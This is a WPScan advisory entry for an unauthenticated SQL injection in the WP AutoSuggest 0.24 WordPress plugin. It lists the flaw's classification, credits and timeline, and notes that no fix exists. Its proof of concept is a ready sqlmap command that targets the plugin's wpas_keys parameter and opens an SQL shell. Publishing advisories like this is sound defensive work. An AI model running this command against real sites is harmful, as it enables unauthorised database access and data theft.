WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP AutoSuggest 0.24 - Unauthenticated SQL Injection

Description

The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.

Proof of Concept

sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell

Affects Plugins

wp-autosuggest
No known fix - plugin closed

References

ExploitDB
45977

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Kaimi

Submitter

Javier Casares

Submitter website
https://www.javiercasares.com/
Submitter twitter
JavierCasares
Verified

Yes

WPVDB ID
01d2cea9-46ba-4d89-9fe9-056917f7a7f8

Timeline

Publicly Published

2018-12-11 (about 4 years ago)

Added

2019-01-07 (about 4 years ago)

Last Updated

2019-11-01 (about 3 years ago)

Our Other Services

WPScan WordPress Security Plugin